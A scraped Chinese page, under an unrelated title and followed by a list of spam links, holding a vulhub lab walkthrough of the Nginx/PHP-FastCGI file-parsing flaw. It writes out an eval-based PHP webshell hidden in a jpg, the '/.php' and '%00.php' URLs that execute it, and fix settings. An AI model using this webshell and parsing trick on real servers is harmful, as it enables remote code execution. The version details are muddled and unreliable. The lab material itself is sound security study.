当前位置: 首页 > news >正文

网站建设中的多语言翻译如何实现航空摄影设计

网站建设中的多语言翻译如何实现,航空摄影设计,wordpress 展示,北京网站开发品牌一、漏洞说明 Nginx文件解析漏洞算是一个比较经典的漏洞&#xff0c;接下来我们就通过如下步骤进行漏洞复现&#xff0c;以及进行漏洞的修复。 版本条件&#xff1a;IIS 7.0/IIS 7.5/ Nginx <8.03 二、搭建环境 cd /vulhub/nginx/nginx_parsing_vulnerability docker-compos…

一、漏洞说明
Nginx文件解析漏洞算是一个比较经典的漏洞,接下来我们就通过如下步骤进行漏洞复现,以及进行漏洞的修复。
版本条件:IIS 7.0/IIS 7.5/ Nginx <8.03
二、搭建环境
cd /vulhub/nginx/nginx_parsing_vulnerability
docker-compose up -d
在这里插入图片描述在这里插入图片描述

三、漏洞特征
访问:http://192.168.25.128/uploadfiles/nginx.png
在这里插入图片描述

然后我们输入/.php,可以发现并没有出现文件为找到,而是出现了php的配置信息
在这里插入图片描述

四、漏洞复现
使用界面的上传功能上传一个jpg图片马,jpg内容是@eval($_POST[“fname”]);
在这里插入图片描述

点击上传后
在这里插入图片描述

然后访问:
http://192.168.25.128/uploadfiles/b82ae21729b331095eb02a213284320d.jpg/.php
在这里插入图片描述

五、修复建议
1.php.ini配置文件中的cgi.fix_pathinfo=1设置为0
2.security.limit_extensions=./php
六、Nginx <8.03 空字节代码执行漏洞
影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
当使用PHP-FastCGI执行PHP时,遇到url里面存在%00空字节时与FastCGI的处理不一致,导致可在非PHP文件中嵌入PHP代码,通过访问url+%00.PHP来执行其中的PHP代码。
例如:"http://127.0.0.1/1.jpg%00.php"会把1.jpg文件(木马文件)当做PHP文件来执行。xxx.jpg%00.php

http://www.yayakq.cn/news/251642/

相关文章:

  • wordpress取消邮件西安seo天勤网络营销
  • 网站动态效果用什么软件做的中国十大贸易公司排名
  • 网站开发项目需求文档h5源码
  • 注册公司那家网站做的比较好乐陵seo公司
  • 谷歌做自己的网站简约wordpress免费主题
  • 深圳勘察设计协会网站在线申请
  • 科技设计网站有哪些内容专业团队文案
  • 威海营销型网站建设网站建设模块
  • 做暧暖免费观看网站上海公司注册地址
  • 如何利用ps做网站网站备案信息查询
  • 苏州公司网站做的网站有营销效果吗
  • 网站建设及维护成本jsp借书网站开发
  • 电子商务网站建设的可行性分析wordpress导航站的源码
  • 信息发布型网站wordpress 博客统计
  • 新建网站软件装修网站横幅怎么做
  • 公司企业网站程序如何做企业网站界面
  • 做办公用品网站资料怎么收集荣耀商城
  • 江苏连云港网站建设公司佛山网站建设公司哪个性比价好些
  • 福清市建设局官方网站派多格宠物网站建设
  • 怎么做淘宝链接网站免费国外在线代理服务器
  • 广州白云住房和建设局网站企业云服务
  • 网站建设构架南昌网站排名推广
  • 像wordpress一样的网站兰州市城市建设设计院网站
  • 网站建设销售怎样做淘宝券网站
  • 建网站素材网站页面设计代码
  • 如何给公司注册网站仿70网站分类目录源码
  • 哪些网站是动态码上游二维码制作
  • 住建部城乡建设网站上饶哪里可以学网站建设
  • 网站建设创意网站免费正能量软件下载视频
  • 巫山那家做网站十大app软件排行榜